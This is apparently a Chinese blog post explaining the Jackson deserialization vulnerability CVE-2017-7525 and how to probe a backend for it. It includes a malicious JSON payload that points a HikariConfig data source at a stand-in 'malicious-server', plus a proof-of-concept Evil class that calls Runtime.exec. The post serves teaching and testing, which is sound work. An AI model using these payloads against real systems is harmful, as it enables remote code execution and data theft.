Jackson 反序列化漏洞

于 2024-08-07 20:45:31 发布
阅读量451 收藏 4
点赞数 6
文章标签: 网络安全 安全 系统安全 web安全 安全架构 python 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50296568/article/details/140990848
版权

文章目录

Jackson 反序列化漏洞利用条件

1.DefaultTyping设置参数:开启了JAVA_LANG_OBJECT
2. @JsonTypeInfo注解: @JsonTypeInfo(use = JsonTypeInfo.Id.MINIMAL_CLASS)或@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)

Jackson 反序列化漏洞原理

CVE-2017-7525 是 Jackson 数据绑定库(jackson-databind)中的一个严重漏洞,允许攻击者通过反序列化恶意构造的 JSON 数据来执行任意代码。该漏洞主要与 Jackson 的多态类型处理机制有关。
多态类型处理功能允许在 JSON 数据中包含一个特殊字段(如 @class),用于指示 JSON 数据应被反序列化为哪个具体的 Java 类。如下所示:

{
  "@class": "com.example.SomeClass",
  "property": "value"
}

在反序列化过程中,Jackson 会读取 @class 字段,并尝试实例化 com.example.SomeClass。如果 SomeClass 类中存在不安全的代码或攻击者可以控制这个类的行为,那么攻击者就可以利用这个机制进行攻击。

漏洞利用过程

1.启用多态类型处理:
应用程序启用了 Jackson 的默认类型处理功能,例如通过 ObjectMapper.enableDefaultTyping()。
此配置允许在反序列化时根据 JSON 中的类型信息(如 @class 字段)实例化具体的类。
2.构造恶意 JSON 数据:
攻击者构造特制的 JSON 数据,包含 @class 字段,指向一个易受攻击的类(如 com.zaxxer.hikari.HikariConfig,该类在初始化时会执行某些操作)。
恶意 JSON 数据示例:

{
  "@class": "com.zaxxer.hikari.HikariConfig",
  "dataSourceClassName": "com.mysql.cj.jdbc.MysqlDataSource",
  "dataSource.url": "jdbc:mysql://malicious-server/malicious-database",
  "dataSource.user": "malicious-user",
  "dataSource.password": "malicious-password"
}

在这个示例中,@class 字段指定了 com.zaxxer.hikari.HikariConfig 类,而其属性则是 HikariCP 数据源的配置。
3.反序列化过程:
当 Jackson 反序列化这个 JSON 数据时,会读取 @class 字段并尝试实例化 com.zaxxer.hikari.HikariConfig。
由于 HikariConfig 类在初始化时会执行一些操作(如设置数据源属性),攻击者可以在这些操作中嵌入恶意代码。例如,攻击者可以配置一个恶意的数据源,使应用连接到一个受攻击者控制的数据库服务器,从而泄露敏感信息或进一步执行攻击。
4.执行任意代码:
如果 HikariConfig 类在初始化过程中执行不安全操作(如加载远程资源或执行脚本),攻击者可以利用这些操作执行任意代码,从而达到远程代码执行的目的。

漏洞示例

存在一个类 com.zaxxer.hikari.HikariConfig,该类在构造函数中执行一些危险操作。如果攻击者可以构造如下的 JSON 数据:

{
  "@class": "com.zaxxer.hikari.HikariConfig",
  "property": "malicious payload"
}

恶意class

public class Evil {

    Evil(){
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Jackson 反序列化漏洞黑盒测试方法

猜测后端是否有Jackson

要判断后端是否有Jackson,可以使用以下方法进行黑盒测试:

  1. 发送一个请求到后端,看后端返回的响应是否包含Jackson提供的标志性特征。Jackson通常会在响应中返回一个包含“Jackson”或“jackson-core”等关键字的响应头或响应体字段。可以使用浏览器的开发者工具或者网络抓包工具查看响应内容来判断。
  2. 查看前后报文是否有发送一个包含JSON数据的请求到后端,看后端是否能够正确地解析和处理JSON数据。如果后端能够正常处理JSON数据,那么很可能后端使用了Jackson库来进行JSON的序列化和反序列化。
  3. 找到一个有Content-Type: application/json的报文,更改post参数,随便Post一段json数据,观察后端返回报文里面是否有错误信息com.fasterxml.jackson显示。
  4. 然后就是使用payload测试了。
B1ackMa9ic
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jackson 反序列化漏洞原理
王嘟嘟的博客
02-28 2974
Jackson 最基础的功能就是将制定的类 序列化 to json,然后json to 序列化的这样一个工具第三方库,正常情况下因为需要执行类进行转换,所以除非是故意留有后门,否则是不会出现问题的。但是为了处理一个情况,就是处理未知的json转换的时候,需要对多种场景进行处理。于是就有了Jackson多态机制。如:需要处理多个子类的情况。那么当json中的指定的类的seter或者无参构造方法中存在可利用点的时候,就会造成有效的反序列化攻击。也就是需要找的反序列化调用链。
jackson反序列化漏洞分析
m0_38043244的博客
06-01 5796
jackson反序列化漏洞分析
反序列化漏洞例子——jackson反序列化漏洞的调试与分析
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
12-30 3532
文章目录反序列化例子漏洞原因漏洞条件enableDefaultTyping@JsonTypeInfo总结调试CVE-2017-7525(基于TemplatesImpl利用链)影响版本利用 Jackson 是用来序列化和反序列化 json 的 Java 的开源框架,Jackson 运行时占用内存比较低,性能比较好,且不依靠除JDK外的其他库。 反序列化例子 举一个jackson进行序列化和反序列化的例子,首先,我的依赖包如下所示: <!-- jackson --> <depe
Jackson反序列化漏洞-spring-boot项目
weixin_40918908的博客
09-01 616
漏洞影响范围:jackson-databind < 2.9.10.6 在升级至版本jackson-databind 2.10.1的时候发现parent中指定了jackson的版本为2.7.0,此时直接依赖pom文件报错 解决办法: 1、升级spring-boot版本到2.2.2(老项目升级完jar包冲突较多) 2、替换parent指定的默认版本 ...
JAVA及Jackson反序列化漏洞.docx
07-27
以CVE-2020-10673为例,这是一个针对Jackson库的反序列化漏洞,它影响了Jackson 2.9.2版本。复现该漏洞通常涉及构造特定的JSON输入,利用Jackson反序列化时的弱点,触发恶意行为。在复现过程中,需要设置合适的环境...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
shiro反序列化测试工具.zip
06-04
- 使用安全反序列化库,例如使用Jackson的`@JsonTypeInfo`和`@JsonAutoDetect`注解来限制反序列化行为。 - 对于存储或传输的序列化数据,使用数字签名或哈希校验来验证数据完整性。 - 及时更新Shiro到最新版本...
java反序列化漏洞URLClassLoader利用1
08-08
2. **使用安全反序列化库**:如果必须反序列化,可以使用已经处理了安全性问题的库,比如Google的Protocol Buffers或Jackson的`ObjectMapper`,并配置它们以限制反序列化的类。 3. **限制类加载器的权限**:通过...
Java反序列化漏洞自动挖掘方法.pdf
08-21
Java反序列化漏洞是软件安全领域中的一个重要话题,尤其在AI信息安全研究和可信编译安全架构中,它关乎系统的安全性和稳定性。反序列化是将从磁盘或网络中读取的序列化数据转换回内存中的对象的过程。在Java中,这一...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8371
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 920
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
供应链安全:黑客攻击 Nimble 包
weixin_47075747的博客
08-04 782
在软件开发领域,包管理器对于管理依赖项和简化开发过程至关重要。但是,这些工具并非对漏洞免疫。今天,我们将深入研究一个有趣的案例研究,了解我如何利用 Nimble 包管理器的漏洞来接管包并可能危害系统。系好安全带;这将是一次技术之旅。
乐凡三防平板|车载三防平板电脑:为行车安全提供保障
livefan的博客
08-05 341
1.提升行车安全:车载三防平板电脑可以实时显示车辆信息,为驾驶人员进行导航指引和路况提醒等,帮助驾驶人员更好地掌握行车情况,为行车安全提供重要保障。3.便于安装与使用:车载三防平板电脑设计紧凑、安装简便,有着多种安装固定方式,几乎可以匹配任意车载工作场所,比如叉车、堆高机、汽车、卡车等。1.防水防尘:车载三防平板电脑具备防水、防尘的性能,可以在恶劣的环境中保持正常工作。2.强大功能集成:车载三防平板电脑的功能多样,不仅具备导航、音乐、蓝牙等基本功能,还可灵活拓展NFC、航空插头接口等,以满足不同工作需求。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
最新发布
洛秋的博客
08-07 1043
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
访问网站显示不安全怎么办?
joySSL_的博客
08-02 708
如果您还在使用http协议,那基本上所有的主流浏览器都是都不安全提示需要给网站安装部署一个SSL证书,有预算的话可以使用付费SSL证书,没有预算的话免费SSL证书也可以实现HTTPS。网站的SSL证书过期,或者域名不匹配,解决方式是点击右上角锁头标志查看证书,检查和更新证书,确保它有效、完整。网站被举报含有钓鱼、欺诈等非法问题,解决方法是联系报告方,证明网站已安全,同时全面检查网站,清除隐患。访问网站时显示“不安全”,针对不同的原因有不同的解决方式,下面是常见的几种原因和对应的解决办法。
鸿蒙系统开发【ASN.1密文转换】安全
2301_76813281的博客
08-02 711
本示例对使用@kit.CryptoArchitectureKit加密后的密文格式进行转换。@kit.CryptoArchitectureKit加密后的密文格式默认为以base64显示的ASN.1格式问题,通过对密文进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密文格式转换,从ASN.1格式转换为c1c3c2格式的裸密文,再以c1c3c2格式的裸密文进行解密,以验证密文转换的正确性。
AI技术如何重塑企业EHS安全健康环保体系,附实践案例
云说智数的博客
08-06 552
在某大型电子工厂中,AI系统通过分析生产数据和环境监测数据,成功预测了一起可能的化学泄漏事故,并及时通知了管理人员采取措施,避免了潜在的环境污染和人员伤亡。某化工厂在发生泄漏事故后,利用AI系统对事故进行了深入分析,不仅快速定位了泄漏源,还发现了操作规程中的缺陷,并据此更新了操作手册,提高了整体的安全管理水平。通过这些实际应用案例,我们可以看到AI技术在EHS管理中的应用潜力和实际效果,它不仅提高了风险管理的效率和准确性,还增强了企业对复杂EHS挑战的应对能力。
Android网络安全:如何防止中间人攻击
陆业聪
08-04 821
本文介绍了在Android开发中预防中间人攻击的方法,包括使用HTTPS加密通信、实施证书锁定、遵循SSL/TLS最佳实践和验证服务器主机名。这些措施有助于保护用户数据安全,提高应用程序安全性。
Java与Jackson反序列化漏洞深度解析
"深入解析JAVA及Jackson反序列化漏洞" 本文主要探讨了Java和Jackson库的反序列化原理,以及相关的安全问题。Java反序列化是一个关键的编程概念,它允许将对象的状态转换为字节流,以便存储或在网络中传输,然后在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值